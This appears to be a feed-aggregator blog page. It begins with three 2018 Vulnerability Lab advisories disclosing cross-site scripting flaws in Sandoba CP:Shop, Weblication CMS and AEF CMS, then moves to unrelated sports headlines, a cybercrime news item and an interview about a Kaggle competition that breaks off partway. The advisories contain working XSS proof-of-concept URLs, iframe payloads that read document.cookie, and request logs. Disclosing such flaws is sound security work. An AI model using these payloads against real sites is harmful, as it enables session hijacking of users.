Document Title: =============== Sandoba CP:Shop CMS v2016.1 - Multiple Cross Site Scripting Vulnerabilities References (Source): ==================== https://ift.tt/2FL7GRk Release Date: ============= 2018-03-02 Vulnerability Laboratory ID (VL-ID): ==================================== 2122 Common Vulnerability Scoring System: ==================================== 3.4 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== CP:Shop is the basis for your lasting success on the Internet. The system was designed so that customers are optimally supplied with information about articles, special promotions and discounts on the one hand, while the shop operator is at the same time subjected to essential work steps through automation. (Copy of the homepage: https://ift.tt/2Gda3M5) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple non-persistent cross site vulnerabilities in the official Sandoa CP:Shop v2016.1 CMS. Vulnerability Disclosure Timeline: ================================== 2018-03-02: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Pre auth - no privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A non-persistent cross site scripting vulnerabilities has been discovered in the official Sandoa CP:Shop v2016.1 Content Management System. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application requests. The security vulnerability is located in the `admin.php` files of the `./cpshop/` module. Remote attackers are able to inject own script codes to the client-side requested vulnerable web-application parameters. The attack vector of the vulnerability is non-persistent and the request method to inject/execute is GET. The vulnerabilities are classic client-side cross site scripting vulnerability. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected or connected application modules. Request Method(s): [+] GET Vulnerable File(s): [+] admin.php Vulnerable Parameter(s): [+] path [+] search [+] rename [+] dir Proof of Concept (PoC): ======================= The web vulnerabilities can be exploited by remote attackers without privileged user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Exploitation https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=fancybox&form[path]= %22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E https://ift.tt/2GARHs1 %22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]= %22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&form[path]=. http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]=TEST&form[path]= %22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E https://ift.tt/2GeTfUN %22%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&select_box=2 https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]= de%3E%22%3Ciframe%20src=evil.source%3E&form[path]=modules%2Ffast_gallery%2Flanguages PoC: Session Logs Status: 200[OK] GET https://cpshop.localhost:8080admin.php?file=files&mode=rename_dir&form[dir]=fancybox&form[path]=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&cleanajax=yes Mime Type[text/html] Request Header: Host[cpshop.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[*/*] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate, br] X-Requested-With[XMLHttpRequest] Referer[https://cpshop.localhost:8080admin.php] Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; log_data=DEMOADMINSHOP; PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; language=de; cookieconsent_dismissed=yes] Connection[keep-alive] Response Header: server[Apache/2.4.27] x-powered-by[PHP/7.0.20] expires[Thu, 19 Nov 1981 08:52:00 GMT] cache-control[no-store, no-cache, must-revalidate] pragma[no-cache] x-frame-options[SAMEORIGIN] content-encoding[gzip] set-cookie[language=de; expires=Tue, 20-Feb-2018 13:00:40 GMT; Max-Age=259200; path=/] content-type[text/html; charset=utf-8] X-Firefox-Spdy[h2] - Status: 302[Found] GET https://ift.tt/2Gw0tqV Mime Type[text/html] Request Header: Host[cpshop.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate, br] Referer[https://cpshop.localhost:8080admin.php] Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; log_data=DEMOADMINSHOP; PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; language=de; cookieconsent_dismissed=yes] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: server[Apache/2.4.27] location[https://ift.tt/2GdPiQh] content-length[296] content-type[text/html; charset=iso-8859-1] X-Firefox-Spdy[h2] - Status: pending[] GET https://ift.tt/2GARKEd http%3A%2F%2Fcpshop.localhost:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2B onl&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news Mime Type[unknown] Request Header: Host[cpshop.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[*/*] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[https://ift.tt/2DZ1Bya] Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de] DNT[1] - 14:06:37.847[179ms][total 538ms] Status: 200[OK] GET https://ift.tt/2Gw0xXH Mime Type[text/html] Request Header: Host[cpshop.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://ift.tt/2DZ1Bya] Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[Apache/2.4.27] X-Powered-By[PHP/7.0.20] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate] Pragma[no-cache] X-Frame-Options[SAMEORIGIN] Content-Encoding[gzip] Set-Cookie[language=de; expires=Tue, 20-Feb-2018 13:06:37 GMT; Max-Age=259200; path=/] Upgrade[h2c] Connection[Upgrade, Keep-Alive] Keep-Alive[timeout=5, max=100] Transfer-Encoding[chunked] Content-Type[text/html; charset=utf-8] Reference(s): https://ift.tt/2GARHs1 https://ift.tt/2GeTfUN https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=fancybox&form[path]= http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]= https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]= Solution - Fix & Patch: ======================= The cross site vulnerabilities can be resolved by implementation of htmlentities and a secure input restriction of characters. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerabilities in the web-application are estimated as medium (cvss 3.4). Credits & Authors: ================== Vulnerability-Lab [research@vulnerability-lab.com] - https://ift.tt/2oPgBXC Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: https://ift.tt/1jnqRwA - https://ift.tt/2oPbqHg - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] Weblication CMS Core & Grid v12.6.24 - Multiple Cross Site Scripting Vulnerabilities

Document Title: =============== Weblication CMS Core & Grid v12.6.24 - Multiple Cross Site Scripting Vulnerabilities References (Source): ==================== https://ift.tt/2EI1dt1 Release Date: ============= 2018-02-21 Vulnerability Laboratory ID (VL-ID): ==================================== 2121 Common Vulnerability Scoring System: ==================================== 3.5 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== https://ift.tt/2IYH6p4 Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the official Weblication CMS Core & Grid v12.006.024 CMS. Vulnerability Disclosure Timeline: ================================== 2018-02-21: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A persistent cross site scripting vulnerability has been discovered in the official Weblication CMS Core & Grid v12.006.024 CMS. The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the service to compromise sensitive user data or affected web-application contents. The security vulnerability is located in the `wFilemanager.php` & `index.php` files of the `/grid5/scripts/` modules. The injection point is located in the Project `Title` and the execution point occurs in the `Inhaltsprojekte` output listing section. Remote attackers with privileged user accounts are able to inject own malicious script code with persistent attack vector to compromise user session credentials or to manipulate the affected web-application module output context. The request method to inject is POST and the attack vector is reflected. The injection point is located in the project Title and the execution point occurs in the Inhaltsprojekte output listing section. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable File(s): [+] index.php [+] wFilemanager.php Vulnerable Input Field(s): [+] Title Affected Module(s): [+] Inhaltsprojekte Proof of Concept (PoC): ======================= The persistent vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC Inject: Title https://ift.tt/2uo7cOR PoC Execute: Inhaltsprojekte https://ift.tt/2IYNQDq default.wVariables.php&target=be&selectedTab=&display=&action=startedit&referrer=%2Fde%2Findex.php&redirectEndEdit=&showFileOptions=&anchor= PoC: Payload "> PoC: Vulnerable Source

Projektbasis

Projekt basiert auf

base_source

Zusätzliche Weblics Quellen

base_sources_additional

z.B. password@http://IHREDOMAIN/vorlageprojekt

Inhaltsprojekte

/de Inhalte

/img-src-x-img-img-src-x-img- ">

Neben den globalen Projekteinstellungen können Sie weitere Einstellungen in den jeweiligen Inhalts- bzw. Sprachprojekten vornehmen.

Logo

PoC: Session Logs Status: 200[OK] POST https://ift.tt/2uo7cOR Mime Type[text/html] Request Header: Host[grid.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Content-Type[application/x-www-form-urlencoded] Content-Length[596] Referer[https://ift.tt/2uo7cOR] Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000] Connection[keep-alive] Upgrade-Insecure-Requests[1] POST-Daten: action[editOptionsProject] path[%2Fimg-src-x-img-img-src-x-img-] title[%22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.domain%29%3E%2520% 22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.cookie%29%3E] pathProjectGlobal[%2Fdefault-wGlobal] pathProjectLayout[] language[br] projectConnect[%2Fimg-src-x-img-img-src-x-img-] hostOnly[] pageOffline[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Foffline.php] permissionDenied[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Fpermission-denied.php] W_PRETMP_groups%5B%5D[%5BW_ID%5D] backupGroup[] Response Header: Server[Apache/2.4.27] X-Powered-By[PHP/7.0.20] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate] Vary[Accept-Encoding] Keep-Alive[timeout=5, max=100] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html; charset=UTF-8] - Status: 200[OK] GET https://ift.tt/2uo7cOR Mime Type[text/html] Request Header: Host[grid.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[https://ift.tt/2uq4uZi wGlobal/content/variables/default.wVariables.php&target=be&referrer=/de/index.php&display=default&editsource=&hasPlaceholdersToInsert=0] Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[Apache/2.4.27] X-Powered-By[PHP/7.0.20] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate] Pragma[no-cache] Content-Encoding[gzip] Vary[Accept-Encoding] Keep-Alive[timeout=5, max=97] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html; charset=UTF-8] - Status: 200[OK] GET https://ift.tt/2IYNTz6 Mime Type[text/html] Request Header: Host[grid.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[https://ift.tt/2uo7cOR] Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[Apache/2.4.27] X-Powered-By[PHP/7.0.20] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate] Pragma[no-cache] Keep-Alive[timeout=5, max=96] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html; charset=UTF-8] Reference(s): https://ift.tt/2uo7fdv https://ift.tt/2IYH9Bg https://ift.tt/2uo7jdf https://ift.tt/2IYNVqI https://ift.tt/2ur54WN Solution - Fix & Patch: ======================= The vulnerability can be resolved by a sanitize of the delivered input through the wFilemanager.php file. Parse in the output location the execution point in the Inhaltsprojekte to resolve the issue. Security Risk: ============== The security risk of the persistent cross site scripting vulnerability in the web-application is estimated as medium (cvss 3.5). Credits & Authors: ================== Benjamin K.M. [research@vulnerability-lab.com] - https://ift.tt/2CTH1QS. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: https://ift.tt/1jnqRwA - https://ift.tt/2oPbqHg - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] AEF CMS v1.0.9 - (PM) Persistent Cross Site Scripting Vulnerability

Document Title: =============== AEF CMS v1.0.9 - (PM) Persistent Cross Site Scripting Vulnerability References (Source): ==================== https://ift.tt/2EEzMA9 Release Date: ============= 2018-02-18 Vulnerability Laboratory ID (VL-ID): ==================================== 2123 Common Vulnerability Scoring System: ==================================== 4.4 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== AEFs full name is Advanced Electron Forum. This bulletin board software is free software. It is written in PHP and MySQL. AEF has a very simple and easy to use Administration Panel and installing this software is a piece of cake! You can install new themes, customize themes the way you want. The User Control Panel has a simple yet beautiful interface where users can set their preferences for the board. This Bulletin board or forum software has all the general features that a forum software should have. (Copy of the Homepage: https://ift.tt/2DYhWTT & https://ift.tt/qN8PnN) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent web vulnerability in the official Advanced Electron Forum v1.0.9 CMS. Vulnerability Disclosure Timeline: ================================== 2018-02-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A persistent cross site scripting vulnerability has been discovered in the official Advanced Electron Forums v1.0.9 Content Management System. The vulnerability allows remote attackers to inject own malicious script code with persistent attack vector to the application-side of the service. The persistent cross site vulnerability is located in the `FTP Link` element of the `Private Message` module. The editor of the private message module allows to insert links without sanitizing the content. Thus allows remote attackers to inject malicious script code payloads as private message to compromise user credentials or to persistent manipulate the affected modules context. The injection point is the editor ftp link element and the execution point occurs in the message body context on arrival. The request method to inject is post with restricted user privileges and the attack vector is located on the application-side. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Private Messages Vulnerable Input(s): [+] Ftp Link (Editor Element) Proof of Concept (PoC): ======================= The cross site scripting web vulnerability can be exploited by low privileged user accounts with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the web-application and login as user 2. Move to the private message module 3. Open up the editor by composing a message 4. add some short text, save the entry as draft 5. Open the draft and insert a ftp link with a script code payload 6. Save the entry and deliver the message to another test user Note: The message only needs to be watched to execute on arrival 7. The test user opens the private message module and the persistent script code executes in the message body context 8. Successful reproduce of the persistent vulnerability! PoC: Payload (Ftplink) %0D%0A%0D%0A or %0D%0A%0D%0A%0D%0A%0D%0A+ PoC: Vulnerable Source PoC: Session Logs (Send Private Message) Status: 200[OK] POST https://ift.tt/2DYQs04 Mime Type[text/html] Request Header: Host[aeforums.localhost:8000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Content-Type[application/x-www-form-urlencoded] Content-Length[174] Referer[https://ift.tt/2DYQs04] Cookie[AEFCookies1526[aefsid]=jmik0sqtslneqffjl537i931brqh3tzr; AEFCookies8381[aefsid]=x1m0rs9lhcl6hl3tbq7qbdh9jn0xsnsf] Connection[keep-alive] Upgrade-Insecure-Requests[1] POST-Daten: pmrecipients[admin] pmsubject[test] pmbody[This+is+a+private+test+message+with+payload+in+the+ftp+link%0D%0A%0D%0A] postcode[yerudyyk4joz8ea5] pmsaveinsentitems[on] sendpm[Send+PM] Response Header: Server[Apache] X-Powered-By[PHP/5.4.45] Content-Length[217] Content-Type[text/html; charset=ISO-8859-1] - Status: 200[OK] GET https://ift.tt/2GwtdQg Mime Type[text/html] Request Header: Host[aeforums.localhost:8000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[https://ift.tt/2DYQs04] Cookie[AEFCookies1526[aefsid]=jmik0sqtslneqffjl537i931brqh3tzr; AEFCookies8381[aefsid]=x1m0rs9lhcl6hl3tbq7qbdh9jn0xsnsf] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[Apache] Accept-Ranges[bytes] Content-Length[431] Content-Type[text/html; charset=UTF-8] Reference(s): https://ift.tt/2DZj9ds https://ift.tt/2GvVCpY Solution - Fix & Patch: ======================= The security vulnerability can be patched by a sanitize of the ftp link element input field in the private message module. Parse in the editor the output location for the link to prevent the execution point of the issue. Security Risk: ============== The security risk of the persistent cross site scripting web vulnerability in the open-source web-application is estimated as medium (cvss 4.4). Credits & Authors: ================== Benjamin K.M. [research@vulnerability-lab.com] - https://ift.tt/2CTH1QS. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: https://ift.tt/1jnqRwA - https://ift.tt/2oPbqHg - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

Monday, March 26, 2018

Ravens president Dick Cass wants to repair "disconnect" in relationship with the fans (ESPN)

from ESPN https://ift.tt/17lH5T2
via IFTTT

Leader of Hacking Group Who Stole $1 Billion From Banks Arrested In Spain

Spanish Police has arrested the alleged leader of an organised Russian cybercrime gang behind the Carbanak and Cobalt malware attacks, which stole over a billion euros from banks worldwide since 2013. In a coordinated operation with law enforcement agencies across the globe, including the FBI and Europol, Police detained the suspected leader of Carbanak hacking group in Alicante, Spain.

from The Hacker News https://ift.tt/2IWAQxM
via IFTTT

Anonymous 'Solo' Actor Dishes On Production, Calls Alden Ehrenrich 'Not Good Enough,'

We only have two months until the release of "Solo: A Star Wars Story," but yet, the drama continues, with an anonymous actor speaking out.

from Google Alert - anonymous https://ift.tt/2pI1iTb
via IFTTT

2018 MLB Goals For All 30 Teams: What the Orioles must accomplish this season - Sam Miller (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

Ravens need to prioritize acquiring WR Cameron Meredith from the Bears - Jamison Hensley (ESPN)

from ESPN https://ift.tt/17lH5T2
via IFTTT

An interview with David Austin: 1st place and $25,000 in Kaggle’s most popular image classification competition

In today’s blog post, I interview David Austin, who, with his teammate, Weimin Wang, took home 1st place (and $25,000) in Kaggle’s Iceberg Classifier Challenge.

David and Weimin’s winning solution can be practically used to allow safer navigation for ships and boats across hazardous waters, resulting in less damages to ships and cargo, and most importantly, reduce accidents, injuries, and deaths.

According to Kaggle, the Iceberg image classification challenge:

Was the most popular image classification challenge they’ve ever had (measured in terms of competing teams)
And was the 7th most popular competition of all time (across all challenges types: image, text, etc.)

Soon after the competition ended, David sent me the following message:

Hi Adrian, I’m a PyImageSearch Guru’s member, consumer of all your books, will be at PyImageConf in August, and an overall appreciative student of your teaching.

Just wanted to share a success story with you, as I just finished in first out of 3,343 teams in the Statoil Iceberg Classifier Kaggle competition ($25k first place prize).

A lot of my deep learning and cv knowledge was acquired through your training and a couple of specific techniques I learned through you were used in my winning solution (thresholding and mini-Googlenet specifically). Just wanted to say thanks and to let you know you’re having a great impact.

Thanks! David

David’s personal message really meant a lot to me, and to be honest, it got me a bit emotional.

As a teacher and educator, there is no better feeling in the world seeing readers:

Get value out what you’ve taught from your blog posts, books, and courses
Use their knowledge in ways that enriches their lives and improves the lives of others

Inside today’s post I’ll be interviewing David and discussing:

What the iceberg image classification challenge is…and why it’s important
The approach, algorithms, and techniques utilized by David and Weimin in their winning submission
What the most difficult aspect of the challenge was (and how they overcame it)
His advice for anyone who wants to compete in a Kaggle competition

I am so incredibly happy for both David and Weimin — they deserve all the congrats and a huge round of applause.

Join me in this interview and discover how David and his teammate Weimin won Kaggle’s most popular image classification competition.

An interview with David Austin: 1st place and $25,000 in Kaggle’s most popular competition

Figure 1: The goal of the Kaggle Iceberg Classifier challenge is to build an image classifier that classifies input regions of a satellite image as either “iceberg” or “ship” (source).

Adrian: Hi David! Thank you for agreeing to do this interview. And congratulations on your 1st place finish in the Kaggle Iceberg Classifier Change, great job!

David: Thanks Adrian, it’s a pleasure to get to speak with you.

Adrian: How did you first become interested in computer vision and deep learning?

David: My interest in deep learning has been growing steadily over the past two years as I’ve seen how people have been using it go gain incredible insights from the data they work with. I have interest in both the active research as well as the practical application sides of deep learning, so I find competing in Kaggle competitions a great place to keep the skills sharp and to try out new techniques as they become available.

Adrian: What was your background in computer vision and machine learning/deep learning before you entered the competition? Did you compete in any previous Kaggle competitions?

David: My first exposure to machine learning goes back about 10 years when I first started learning about gradient boosted trees and random forests and applying them to classification type problems. Over the past couple of years I’ve started focusing more extensively on deep learning and computer vision.

I started competing in Kaggle competitions a little under a year ago in my spare time as a way to sharpen my skills, and this was my third image classification competition.

Figure 2: An example of how an iceberg looks. The goal of the Kaggle competition was to recognize such icebergs from satellite imagery (source).

Adrian: Can you tell me a bit more about the Iceberg Classifier Challenge? What motivated you to compete in it?

David: Sure, the Iceberg Classification Challenge was a binary image classification problem in which the participants were asked to classify ships vs. icebergs collected via satellite imagery. It’s especially important in the energy exploration space to be able to identify and avoid threats such as drifting icebergs.

There were a couple interesting aspects to the dataset that made this a fun challenge to work on.

First, the dataset was relatively small with only 1604 images in the training set, so the barrier to entry from a hardware perspective was pretty low, but the difficulty of working with a limited dataset was high.

Secondly, when looking at the images, to the human eye many of them look analogous to what a “snowy” TV screen looks like, just a bunch of salt and pepper noise and it was not at all visually clear which images were ships and which ones were icebergs:

Figure 3: It’s extremely difficult for the human eye to accurately determine if an input region is an “iceberg” or a “ship” (source).

So the fact that it would be particularly difficult for a human to accurately predict the classifications, I thought it would serve as a great test to see what computer vision and deep learning could do.

Figure 4: David and Weimin winning solution involved using an ensemble of CNN architectures.

Adrian: Let’s get a bit technical. Can you tell us a bit about the approach, algorithms, and techniques you used in your winning entry?

David: Well, the overall approach was very similar to most typical computer vision problems in that we spent quite a bit of time up front understanding the data.

One of my favorite techniques early on is to use unsupervised learning methods to identify natural patterns in the data, and use that learning to determine what deep learning approaches to take down-stream.

In this case a standard KNN algorithm was able to identify a key signal that helped define our model architecture. From there, we used a pretty extensive CNN architecture that consisted of over 100+ customized CNN’s and VGG like architectures and then combined the results from these models using both greedy blending and two-level stacking with other image features.

Now that may sound like a very complex approach, but remember that the objective function here was to minimize log loss error, and in this case we only added models in so much as they reduced log loss without overfitting, so it was another good example of the power of ensembling many weaker learners.

We ended up training many of the same CNN’s a second time but only using a subset of the data that we identified from the unsupervised learning at the beginning of the process as this also gave us an improvement in performance.

